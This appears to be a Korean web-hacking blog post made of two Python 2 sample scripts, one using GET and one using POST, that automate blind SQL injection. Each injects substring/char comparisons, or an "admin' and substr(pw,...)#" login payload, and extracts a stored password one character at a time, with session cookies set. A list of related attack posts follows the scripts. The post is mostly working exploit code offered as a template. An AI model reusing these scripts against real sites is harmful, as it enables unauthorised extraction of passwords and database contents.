[GET 방식 샘플]
import re,urllib,urllib2
#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()
password=""
for j in range(1,100):
print "%d" %j
for i in range(33,126):
url="http://binaryu.tistory.com/index.php?no=2+and+substring(pw,%d,1)=char(%d)" %(j,i)
req=urllib2.Request(url)
req.add_header('Cookie',"notice=yes; PHPSESSID=863fc9ebeb49ef2bb20976baed9de368")
read=urllib2.urlopen(req).read()
ok = re.findall("True",read)
if ok:
password=password+chr(i)
print password
break
[POST 방식 샘플]
import re,urllib,urllib2
#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()
password=""
for j in range(1, 33):
for i in range(48,123):
if i < 58 or i > 96:
url="http://binaryu.tistory.com/index.php"
login_form={"id": "admin' and substr(pw,%d,1)=char(%s)#" %(j,i), "pw": ""}
login_req=urllib.urlencode(login_form)
req=urllib2.Request(url,login_req)
req.add_header('Cookie',"notice=yes; PHPSESSID=c473aaff2c3d93c21ad8a0a2cf505036")
read=urllib2.urlopen(req).read()
ok = re.findall("Wrong password!",read)
if ok:
password=password+chr(i)
print password
break
'Webhacking' 카테고리의 다른 글
| XML Attack Surface (0) | 2013.08.28 |
|---|---|
| SQL Injection 공백 우회방법 (0) | 2013.03.04 |
| [PHP2EXE] PHP Compiler/Embedder 1.21 (0) | 2013.03.04 |
| .htaccess Attack Sample for PHP (0) | 2013.03.04 |
| webhacking.kr 9번 문제 풀이 (1) | 2013.03.04 |